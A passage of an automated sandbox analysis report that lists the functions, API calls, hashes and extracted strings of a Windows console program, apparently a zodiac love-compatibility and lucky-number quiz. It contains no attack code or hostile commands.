                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1CEB
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1CFF
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1D13
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1D27
                                                                            • Part of subcall function 013D1C60: _wscanf.LIBCMT ref: 013D1D40
                                                                          • __wsystem.LIBCMT ref: 013D5B9F
                                                                          • _wprintf.LIBCMT ref: 013D5BC1
                                                                          • _wprintf.LIBCMT ref: 013D5C33
                                                                          • _wprintf.LIBCMT ref: 013D5C3D
                                                                          • _wprintf.LIBCMT ref: 013D5C68
                                                                          • _wprintf.LIBCMT ref: 013D5C72
                                                                          • __wsystem.LIBCMT ref: 013D5C89
                                                                          • __wsystem.LIBCMT ref: 013D5CAE
                                                                          • _wprintf.LIBCMT ref: 013D5CD0
                                                                          • _wprintf.LIBCMT ref: 013D5CE4
                                                                          • _wprintf.LIBCMT ref: 013D5D03
                                                                          • _wprintf.LIBCMT ref: 013D5D14
                                                                          • _wprintf.LIBCMT ref: 013D5D3E
                                                                          • _wprintf.LIBCMT ref: 013D5D5C
                                                                          • _wprintf.LIBCMT ref: 013D5D70
                                                                          • __wsystem.LIBCMT ref: 013D5D87
                                                                          • __wsystem.LIBCMT ref: 013D6138
                                                                          • _wprintf.LIBCMT ref: 013D614D
                                                                          • _wprintf.LIBCMT ref: 013D6165
                                                                          • _wprintf.LIBCMT ref: 013D6183
                                                                          • _wprintf.LIBCMT ref: 013D61B2
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.241760382.00000000013D1000.00000020.00020000.sdmp, Offset: 013D0000, based on PE: true
                                                                          • Associated: 00000000.00000002.241755705.00000000013D0000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241777844.00000000013EF000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241787301.00000000013FA000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241791824.00000000013FB000.00000040.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241798152.0000000001400000.00000002.00020000.sdmp Download File
                                                                          Similarity
                                                                          • API ID: _wprintf$__wsystem$__ftbuf__invoke_watson__output_l__stbuf__waccess_s__wdupenv_s_free_wscanf
                                                                          • String ID: Enter any key.....$WE HOPE THAT IT WAS HELPFUL$%s$Enter any key....$ THE SYSTEM WILL RESTART IN FEW SECONDS!!!$%d$($------------------------------------------------------------------$Age=%d$Enter any key to continue...$HERE IS WHAT YOU ARE!!!$Name: %s$SCORPIUS AND AQUARIUS LOVE COMPATIBILITY$SCORPIUS AND ARIES LOVE COMPATIBILITY$SCORPIUS AND CANCER LOVE COMPATIBILITY$SCORPIUS AND CAPRICORN LOVE COMPATIBILITY$SCORPIUS AND GEMINI LOVE COMPATIBILITY$SCORPIUS AND LEO LOVE COMPATIBILITY$SCORPIUS AND LIBRA LOVE COMPATIBILITY$SCORPIUS AND PISCES LOVE COMPATIBILITY$SCORPIUS AND SAGGITARIUS LOVE COMPATIBILITY$SCORPIUS AND SCORPIO LOVE COMPATIBILITY$SCORPIUS AND TAURUS LOVE COMPATIBILITY$SCORPIUS AND VIRGO LOVE COMPATIBILITY$Sex=%c$VUUU$YOUR LUCKY NUMBERS ARE: %d$cls$gfff
                                                                          • API String ID: 2876428006-3462511952
                                                                          • Opcode ID: 695a966e839997b4f40545c7b45c1409c3cd3f5cde28e2562322d7b41755662a
                                                                          • Instruction ID: 3bbc7d842c8cc889b1a5fb2a16b98b872e2edf23264f4e2d03275d9c1f210cb2
                                                                          • Opcode Fuzzy Hash: 695a966e839997b4f40545c7b45c1409c3cd3f5cde28e2562322d7b41755662a
                                                                          • Instruction Fuzzy Hash: FDE1F0B7A0028ABBC710BBEFFC45E5F6A6DABE779CF01411CF15466204DA70891187B6
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 013D4BA8, Relevance: 137.0, APIs: 49, Strings: 29, Instructions: 475COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • __wsystem.LIBCMT ref: 013D4BEE
                                                                            • Part of subcall function 013DB418: __wdupenv_s.LIBCMT ref: 013DB433
                                                                            • Part of subcall function 013DB418: __invoke_watson.LIBCMT ref: 013DB449
                                                                            • Part of subcall function 013DB418: __waccess_s.LIBCMT ref: 013DB465
                                                                            • Part of subcall function 013DB418: _free.LIBCMT ref: 013DB4E9
                                                                          • _wprintf.LIBCMT ref: 013D4C06
                                                                          • _wprintf.LIBCMT ref: 013D4C28
                                                                            • Part of subcall function 013DB9F5: __stbuf.LIBCMT ref: 013DBA43
                                                                            • Part of subcall function 013DB9F5: __output_l.LIBCMT ref: 013DBA5B
                                                                            • Part of subcall function 013DB9F5: __ftbuf.LIBCMT ref: 013DBA6C
                                                                          • _wprintf.LIBCMT ref: 013D4C49
                                                                            • Part of subcall function 013D1850: _wprintf.LIBCMT ref: 013D185F
                                                                            • Part of subcall function 013D1850: _wprintf.LIBCMT ref: 013D1873
                                                                            • Part of subcall function 013D1850: _wprintf.LIBCMT ref: 013D1887
                                                                            • Part of subcall function 013D1850: _wprintf.LIBCMT ref: 013D189B
                                                                            • Part of subcall function 013D1850: _wprintf.LIBCMT ref: 013D18AF
                                                                            • Part of subcall function 013D1850: _wprintf.LIBCMT ref: 013D18C3
                                                                            • Part of subcall function 013D1850: _wprintf.LIBCMT ref: 013D18D7
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1C73
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1C87
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1C9B
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1CAF
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1CC3
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1CD7
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1CEB
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1CFF
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1D13
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1D27
                                                                            • Part of subcall function 013D1C60: _wscanf.LIBCMT ref: 013D1D40
                                                                          • __wsystem.LIBCMT ref: 013D4C8C
                                                                          • _wprintf.LIBCMT ref: 013D4CAE
                                                                          • _wprintf.LIBCMT ref: 013D4D21
                                                                          • _wprintf.LIBCMT ref: 013D4D2B
                                                                          • _wprintf.LIBCMT ref: 013D4D56
                                                                          • _wprintf.LIBCMT ref: 013D4D60
                                                                          • __wsystem.LIBCMT ref: 013D4D77
                                                                          • __wsystem.LIBCMT ref: 013D4D9C
                                                                          • _wprintf.LIBCMT ref: 013D4DBE
                                                                          • _wprintf.LIBCMT ref: 013D4DD2
                                                                          • _wprintf.LIBCMT ref: 013D4DEF
                                                                          • _wprintf.LIBCMT ref: 013D4E00
                                                                          • _wprintf.LIBCMT ref: 013D4E24
                                                                          • _wprintf.LIBCMT ref: 013D4E45
                                                                          • _wprintf.LIBCMT ref: 013D4E59
                                                                          • __wsystem.LIBCMT ref: 013D4E70
                                                                          • __wsystem.LIBCMT ref: 013D5221
                                                                          • _wprintf.LIBCMT ref: 013D5236
                                                                          • _wprintf.LIBCMT ref: 013D524E
                                                                          • _wprintf.LIBCMT ref: 013D526C
                                                                          • _wprintf.LIBCMT ref: 013D52A2
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.241760382.00000000013D1000.00000020.00020000.sdmp, Offset: 013D0000, based on PE: true
                                                                          • Associated: 00000000.00000002.241755705.00000000013D0000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241777844.00000000013EF000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241787301.00000000013FA000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241791824.00000000013FB000.00000040.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241798152.0000000001400000.00000002.00020000.sdmp Download File
                                                                          Similarity
                                                                          • API ID: _wprintf$__wsystem$__ftbuf__invoke_watson__output_l__stbuf__waccess_s__wdupenv_s_free_wscanf
                                                                          • String ID: Enter any key.....$WE HOPE THAT IT WAS HELPFUL$%s$Enter any key....$ THE SYSTEM WILL RESTART IN FEW SECONDS!!!$%d$------------------------------------------------------------------$4$Age=%d$Enter any key to continue...$HERE IS WHAT YOU ARE!!!$Name: %s$Sex=%c$VIRGO AND AQUARIUS LOVE COMPATIBILITY$VIRGO AND ARIES LOVE COMPATIBILITY$VIRGO AND CANCER LOVE COMPATIBILITY$VIRGO AND CAPRICORN LOVE COMPATIBILITY$VIRGO AND GEMINI LOVE COMPATIBILITY$VIRGO AND LEO LOVE COMPATIBILITY$VIRGO AND LIBRA LOVE COMPATIBILITY$VIRGO AND PISCES LOVE COMPATIBILITY$VIRGO AND SAGGITARIUS LOVE COMPATIBILITY$VIRGO AND SCORPIO LOVE COMPATIBILITY$VIRGO AND TAURUS LOVE COMPATIBILITY$VIRGO AND VIRGO LOVE COMPATIBILITY$YOUR LUCKY NUMBERS ARE: %d$cls$gfff$gfff
                                                                          • API String ID: 2876428006-464010703
                                                                          • Opcode ID: 9fe59d105415da572bf9b7d4121a77741489c2bf85208129cc00f0bf906cbcbe
                                                                          • Instruction ID: fd2a81e6d0cd6a427933e6d10283e0600ae29cb04ac27035e65b3d30b2bd0a23
                                                                          • Opcode Fuzzy Hash: 9fe59d105415da572bf9b7d4121a77741489c2bf85208129cc00f0bf906cbcbe
                                                                          • Instruction Fuzzy Hash: C5E1F3B6A40286BBC714BBEFBC45E5F6A7CEBE779CF01402CF15466608DA70850587B2
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 013D3D40, Relevance: 137.0, APIs: 49, Strings: 29, Instructions: 473COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • __wsystem.LIBCMT ref: 013D3D4D
                                                                            • Part of subcall function 013DB418: __wdupenv_s.LIBCMT ref: 013DB433
                                                                            • Part of subcall function 013DB418: __invoke_watson.LIBCMT ref: 013DB449
                                                                            • Part of subcall function 013DB418: __waccess_s.LIBCMT ref: 013DB465
                                                                            • Part of subcall function 013DB418: _free.LIBCMT ref: 013DB4E9
                                                                          • _wprintf.LIBCMT ref: 013D3D65
                                                                          • _wprintf.LIBCMT ref: 013D3D87
                                                                            • Part of subcall function 013DB9F5: __stbuf.LIBCMT ref: 013DBA43
                                                                            • Part of subcall function 013DB9F5: __output_l.LIBCMT ref: 013DBA5B
                                                                            • Part of subcall function 013DB9F5: __ftbuf.LIBCMT ref: 013DBA6C
                                                                          • _wprintf.LIBCMT ref: 013D3DA9
                                                                            • Part of subcall function 013D1760: _wprintf.LIBCMT ref: 013D176F
                                                                            • Part of subcall function 013D1760: _wprintf.LIBCMT ref: 013D1783
                                                                            • Part of subcall function 013D1760: _wprintf.LIBCMT ref: 013D1797
                                                                            • Part of subcall function 013D1760: _wprintf.LIBCMT ref: 013D17AB
                                                                            • Part of subcall function 013D1760: _wprintf.LIBCMT ref: 013D17BF
                                                                            • Part of subcall function 013D1760: _wprintf.LIBCMT ref: 013D17D3
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1C73
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1C87
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1C9B
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1CAF
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1CC3
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1CD7
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1CEB
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1CFF
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1D13
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1D27
                                                                            • Part of subcall function 013D1C60: _wscanf.LIBCMT ref: 013D1D40
                                                                          • __wsystem.LIBCMT ref: 013D3DE3
                                                                          • _wprintf.LIBCMT ref: 013D3E08
                                                                          • _wprintf.LIBCMT ref: 013D3E77
                                                                          • _wprintf.LIBCMT ref: 013D3E81
                                                                          • _wprintf.LIBCMT ref: 013D3EAC
                                                                          • _wprintf.LIBCMT ref: 013D3EB6
                                                                          • __wsystem.LIBCMT ref: 013D3ECD
                                                                          • __wsystem.LIBCMT ref: 013D3EF5
                                                                          • _wprintf.LIBCMT ref: 013D3F1A
                                                                          • _wprintf.LIBCMT ref: 013D3F2E
                                                                          • _wprintf.LIBCMT ref: 013D3F4A
                                                                          • _wprintf.LIBCMT ref: 013D3F58
                                                                          • _wprintf.LIBCMT ref: 013D3F78
                                                                          • _wprintf.LIBCMT ref: 013D3FA0
                                                                          • _wprintf.LIBCMT ref: 013D3FB4
                                                                          • __wsystem.LIBCMT ref: 013D3FCB
                                                                          • __wsystem.LIBCMT ref: 013D43AD
                                                                          • _wprintf.LIBCMT ref: 013D43C2
                                                                          • _wprintf.LIBCMT ref: 013D43DA
                                                                          • _wprintf.LIBCMT ref: 013D43F8
                                                                          • _wprintf.LIBCMT ref: 013D4428
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.241760382.00000000013D1000.00000020.00020000.sdmp, Offset: 013D0000, based on PE: true
                                                                          • Associated: 00000000.00000002.241755705.00000000013D0000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241777844.00000000013EF000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241787301.00000000013FA000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241791824.00000000013FB000.00000040.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241798152.0000000001400000.00000002.00020000.sdmp Download File
                                                                          Similarity
                                                                          • API ID: _wprintf$__wsystem$__ftbuf__invoke_watson__output_l__stbuf__waccess_s__wdupenv_s_free_wscanf
                                                                          • String ID: Enter any key.....$WE HOPE THAT IT WAS HELPFUL$%s$Enter any key....$ THE SYSTEM WILL RESTART IN FEW SECONDS!!!$%$%d$------------------------------------------------------------------$Age=%d$CANCER AND AQUARIUS LOVE COMPATIBILITY$CANCER AND ARIES LOVE COMPATIBILITY$CANCER AND CANCER LOVE COMPATIBILITY$CANCER AND CAPRICORN LOVE COMPATIBILITY$CANCER AND GEMINI LOVE COMPATIBILITY$CANCER AND LEO LOVE COMPATIBILITY$CANCER AND LIBRA LOVE COMPATIBILITY$CANCER AND PISCES LOVE COMPATIBILITY$CANCER AND SAGGITARIUS LOVE COMPATIBILITY$CANCER AND SCORPIO LOVE COMPATIBILITY$CANCER AND TAURUS LOVE COMPATIBILITY$CANCER AND VIRGO LOVE COMPATIBILITY$Enter any key to continue...$HERE IS WHAT YOU ARE!!!$Name: %s$Sex=%c$YOUR LUCKY NUMBERS ARE: %d$cls$gfff$gfff
                                                                          • API String ID: 2876428006-2243083048
                                                                          • Opcode ID: 1f09d06c193417a21156882beb6c4a41f2b1555a38eb69741d1a1f689a1d3415
                                                                          • Instruction ID: 749cfcfbb8cd7745f4c07c5cdaf19de6f9a68156dbf94a257a9f66c1ee205800
                                                                          • Opcode Fuzzy Hash: 1f09d06c193417a21156882beb6c4a41f2b1555a38eb69741d1a1f689a1d3415
                                                                          • Instruction Fuzzy Hash: 7DE1B1B364024AABC700BFEEFD45D6F666DAFA679CF02411CF15466208DA708C118BB3
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 013D4BE0, Relevance: 137.0, APIs: 49, Strings: 29, Instructions: 462COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • __wsystem.LIBCMT ref: 013D4BEE
                                                                            • Part of subcall function 013DB418: __wdupenv_s.LIBCMT ref: 013DB433
                                                                            • Part of subcall function 013DB418: __invoke_watson.LIBCMT ref: 013DB449
                                                                            • Part of subcall function 013DB418: __waccess_s.LIBCMT ref: 013DB465
                                                                            • Part of subcall function 013DB418: _free.LIBCMT ref: 013DB4E9
                                                                          • _wprintf.LIBCMT ref: 013D4C06
                                                                          • _wprintf.LIBCMT ref: 013D4C28
                                                                            • Part of subcall function 013DB9F5: __stbuf.LIBCMT ref: 013DBA43
                                                                            • Part of subcall function 013DB9F5: __output_l.LIBCMT ref: 013DBA5B
                                                                            • Part of subcall function 013DB9F5: __ftbuf.LIBCMT ref: 013DBA6C
                                                                          • _wprintf.LIBCMT ref: 013D4C49
                                                                            • Part of subcall function 013D1850: _wprintf.LIBCMT ref: 013D185F
                                                                            • Part of subcall function 013D1850: _wprintf.LIBCMT ref: 013D1873
                                                                            • Part of subcall function 013D1850: _wprintf.LIBCMT ref: 013D1887
                                                                            • Part of subcall function 013D1850: _wprintf.LIBCMT ref: 013D189B
                                                                            • Part of subcall function 013D1850: _wprintf.LIBCMT ref: 013D18AF
                                                                            • Part of subcall function 013D1850: _wprintf.LIBCMT ref: 013D18C3
                                                                            • Part of subcall function 013D1850: _wprintf.LIBCMT ref: 013D18D7
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1C73
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1C87
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1C9B
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1CAF
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1CC3
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1CD7
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1CEB
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1CFF
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1D13
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1D27
                                                                            • Part of subcall function 013D1C60: _wscanf.LIBCMT ref: 013D1D40
                                                                          • __wsystem.LIBCMT ref: 013D4C8C
                                                                          • _wprintf.LIBCMT ref: 013D4CAE
                                                                          • _wprintf.LIBCMT ref: 013D4D21
                                                                          • _wprintf.LIBCMT ref: 013D4D2B
                                                                          • _wprintf.LIBCMT ref: 013D4D56
                                                                          • _wprintf.LIBCMT ref: 013D4D60
                                                                          • __wsystem.LIBCMT ref: 013D4D77
                                                                          • __wsystem.LIBCMT ref: 013D4D9C
                                                                          • _wprintf.LIBCMT ref: 013D4DBE
                                                                          • _wprintf.LIBCMT ref: 013D4DD2
                                                                          • _wprintf.LIBCMT ref: 013D4DEF
                                                                          • _wprintf.LIBCMT ref: 013D4E00
                                                                          • _wprintf.LIBCMT ref: 013D4E24
                                                                          • _wprintf.LIBCMT ref: 013D4E45
                                                                          • _wprintf.LIBCMT ref: 013D4E59
                                                                          • __wsystem.LIBCMT ref: 013D4E70
                                                                          • __wsystem.LIBCMT ref: 013D5221
                                                                          • _wprintf.LIBCMT ref: 013D5236
                                                                          • _wprintf.LIBCMT ref: 013D524E
                                                                          • _wprintf.LIBCMT ref: 013D526C
                                                                          • _wprintf.LIBCMT ref: 013D52A2
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.241760382.00000000013D1000.00000020.00020000.sdmp, Offset: 013D0000, based on PE: true
                                                                          • Associated: 00000000.00000002.241755705.00000000013D0000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241777844.00000000013EF000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241787301.00000000013FA000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241791824.00000000013FB000.00000040.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241798152.0000000001400000.00000002.00020000.sdmp Download File
                                                                          Similarity
                                                                          • API ID: _wprintf$__wsystem$__ftbuf__invoke_watson__output_l__stbuf__waccess_s__wdupenv_s_free_wscanf
                                                                          • String ID: Enter any key.....$WE HOPE THAT IT WAS HELPFUL$%s$Enter any key....$ THE SYSTEM WILL RESTART IN FEW SECONDS!!!$%d$------------------------------------------------------------------$4$Age=%d$Enter any key to continue...$HERE IS WHAT YOU ARE!!!$Name: %s$Sex=%c$VIRGO AND AQUARIUS LOVE COMPATIBILITY$VIRGO AND ARIES LOVE COMPATIBILITY$VIRGO AND CANCER LOVE COMPATIBILITY$VIRGO AND CAPRICORN LOVE COMPATIBILITY$VIRGO AND GEMINI LOVE COMPATIBILITY$VIRGO AND LEO LOVE COMPATIBILITY$VIRGO AND LIBRA LOVE COMPATIBILITY$VIRGO AND PISCES LOVE COMPATIBILITY$VIRGO AND SAGGITARIUS LOVE COMPATIBILITY$VIRGO AND SCORPIO LOVE COMPATIBILITY$VIRGO AND TAURUS LOVE COMPATIBILITY$VIRGO AND VIRGO LOVE COMPATIBILITY$YOUR LUCKY NUMBERS ARE: %d$cls$gfff$gfff
                                                                          • API String ID: 2876428006-464010703
                                                                          • Opcode ID: 3ab13214eebb99cd1dbb899b033fa7c8d910ec4aabb3b4dcc6d2638ed2021453
                                                                          • Instruction ID: 66e7e7b90a72f1e076450075faa1e856131712e192f8a2e299c2a42286b47a08
                                                                          • Opcode Fuzzy Hash: 3ab13214eebb99cd1dbb899b033fa7c8d910ec4aabb3b4dcc6d2638ed2021453
                                                                          • Instruction Fuzzy Hash: 59E1F4B764028ABBC710BBEFBC45E5F6A7CEBE679CF01402CF55466608DA70850587B2
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 013D5B00, Relevance: 137.0, APIs: 49, Strings: 29, Instructions: 459COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • __wsystem.LIBCMT ref: 013D5B0E
                                                                            • Part of subcall function 013DB418: __wdupenv_s.LIBCMT ref: 013DB433
                                                                            • Part of subcall function 013DB418: __invoke_watson.LIBCMT ref: 013DB449
                                                                            • Part of subcall function 013DB418: __waccess_s.LIBCMT ref: 013DB465
                                                                            • Part of subcall function 013DB418: _free.LIBCMT ref: 013DB4E9
                                                                          • _wprintf.LIBCMT ref: 013D5B26
                                                                          • _wprintf.LIBCMT ref: 013D5B48
                                                                            • Part of subcall function 013DB9F5: __stbuf.LIBCMT ref: 013DBA43
                                                                            • Part of subcall function 013DB9F5: __output_l.LIBCMT ref: 013DBA5B
                                                                            • Part of subcall function 013DB9F5: __ftbuf.LIBCMT ref: 013DBA6C
                                                                          • _wprintf.LIBCMT ref: 013D5B69
                                                                            • Part of subcall function 013D1940: _wprintf.LIBCMT ref: 013D194F
                                                                            • Part of subcall function 013D1940: _wprintf.LIBCMT ref: 013D1963
                                                                            • Part of subcall function 013D1940: _wprintf.LIBCMT ref: 013D1977
                                                                            • Part of subcall function 013D1940: _wprintf.LIBCMT ref: 013D198B
                                                                            • Part of subcall function 013D1940: _wprintf.LIBCMT ref: 013D199F
                                                                            • Part of subcall function 013D1940: _wprintf.LIBCMT ref: 013D19B3
                                                                            • Part of subcall function 013D1940: _wprintf.LIBCMT ref: 013D19C7
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1C73
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1C87
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1C9B
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1CAF
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1CC3
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1CD7
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1CEB
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1CFF
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1D13
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1D27
                                                                            • Part of subcall function 013D1C60: _wscanf.LIBCMT ref: 013D1D40
                                                                          • __wsystem.LIBCMT ref: 013D5B9F
                                                                          • _wprintf.LIBCMT ref: 013D5BC1
                                                                          • _wprintf.LIBCMT ref: 013D5C33
                                                                          • _wprintf.LIBCMT ref: 013D5C3D
                                                                          • _wprintf.LIBCMT ref: 013D5C68
                                                                          • _wprintf.LIBCMT ref: 013D5C72
                                                                          • __wsystem.LIBCMT ref: 013D5C89
                                                                          • __wsystem.LIBCMT ref: 013D5CAE
                                                                          • _wprintf.LIBCMT ref: 013D5CD0
                                                                          • _wprintf.LIBCMT ref: 013D5CE4
                                                                          • _wprintf.LIBCMT ref: 013D5D03
                                                                          • _wprintf.LIBCMT ref: 013D5D14
                                                                          • _wprintf.LIBCMT ref: 013D5D3E
                                                                          • _wprintf.LIBCMT ref: 013D5D5C
                                                                          • _wprintf.LIBCMT ref: 013D5D70
                                                                          • __wsystem.LIBCMT ref: 013D5D87
                                                                          • __wsystem.LIBCMT ref: 013D6138
                                                                          • _wprintf.LIBCMT ref: 013D614D
                                                                          • _wprintf.LIBCMT ref: 013D6165
                                                                          • _wprintf.LIBCMT ref: 013D6183
                                                                          • _wprintf.LIBCMT ref: 013D61B2
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.241760382.00000000013D1000.00000020.00020000.sdmp, Offset: 013D0000, based on PE: true
                                                                          • Associated: 00000000.00000002.241755705.00000000013D0000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241777844.00000000013EF000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241787301.00000000013FA000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241791824.00000000013FB000.00000040.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241798152.0000000001400000.00000002.00020000.sdmp Download File
                                                                          Similarity
                                                                          • API ID: _wprintf$__wsystem$__ftbuf__invoke_watson__output_l__stbuf__waccess_s__wdupenv_s_free_wscanf
                                                                          • String ID: Enter any key.....$WE HOPE THAT IT WAS HELPFUL$%s$Enter any key....$ THE SYSTEM WILL RESTART IN FEW SECONDS!!!$%d$($------------------------------------------------------------------$Age=%d$Enter any key to continue...$HERE IS WHAT YOU ARE!!!$Name: %s$SCORPIUS AND AQUARIUS LOVE COMPATIBILITY$SCORPIUS AND ARIES LOVE COMPATIBILITY$SCORPIUS AND CANCER LOVE COMPATIBILITY$SCORPIUS AND CAPRICORN LOVE COMPATIBILITY$SCORPIUS AND GEMINI LOVE COMPATIBILITY$SCORPIUS AND LEO LOVE COMPATIBILITY$SCORPIUS AND LIBRA LOVE COMPATIBILITY$SCORPIUS AND PISCES LOVE COMPATIBILITY$SCORPIUS AND SAGGITARIUS LOVE COMPATIBILITY$SCORPIUS AND SCORPIO LOVE COMPATIBILITY$SCORPIUS AND TAURUS LOVE COMPATIBILITY$SCORPIUS AND VIRGO LOVE COMPATIBILITY$Sex=%c$VUUU$YOUR LUCKY NUMBERS ARE: %d$cls$gfff
                                                                          • API String ID: 2876428006-3462511952
                                                                          • Opcode ID: 8c124a7b1c5bce2efe24a09eabb2d5b12c7683e838880458cb780d7def240319
                                                                          • Instruction ID: f97eb29bac029ab5a664abfc3e17c52e3b72cd5e8b52f682ffac36d49e77df8c
                                                                          • Opcode Fuzzy Hash: 8c124a7b1c5bce2efe24a09eabb2d5b12c7683e838880458cb780d7def240319
                                                                          • Instruction Fuzzy Hash: B1E1F1B7A0028ABBC710BBEFFC46E5F6A6DABE779CF01411CF15466204DA74850187B6
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 013D4490, Relevance: 135.2, APIs: 49, Strings: 28, Instructions: 480COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • __wsystem.LIBCMT ref: 013D449D
                                                                            • Part of subcall function 013DB418: __wdupenv_s.LIBCMT ref: 013DB433
                                                                            • Part of subcall function 013DB418: __invoke_watson.LIBCMT ref: 013DB449
                                                                            • Part of subcall function 013DB418: __waccess_s.LIBCMT ref: 013DB465
                                                                            • Part of subcall function 013DB418: _free.LIBCMT ref: 013DB4E9
                                                                          • _wprintf.LIBCMT ref: 013D44B5
                                                                          • _wprintf.LIBCMT ref: 013D44D7
                                                                            • Part of subcall function 013DB9F5: __stbuf.LIBCMT ref: 013DBA43
                                                                            • Part of subcall function 013DB9F5: __output_l.LIBCMT ref: 013DBA5B
                                                                            • Part of subcall function 013DB9F5: __ftbuf.LIBCMT ref: 013DBA6C
                                                                          • _wprintf.LIBCMT ref: 013D44F9
                                                                            • Part of subcall function 013D17E0: _wprintf.LIBCMT ref: 013D17EF
                                                                            • Part of subcall function 013D17E0: _wprintf.LIBCMT ref: 013D1803
                                                                            • Part of subcall function 013D17E0: _wprintf.LIBCMT ref: 013D1817
                                                                            • Part of subcall function 013D17E0: _wprintf.LIBCMT ref: 013D182B
                                                                            • Part of subcall function 013D17E0: _wprintf.LIBCMT ref: 013D183F
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1C73
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1C87
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1C9B
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1CAF
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1CC3
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1CD7
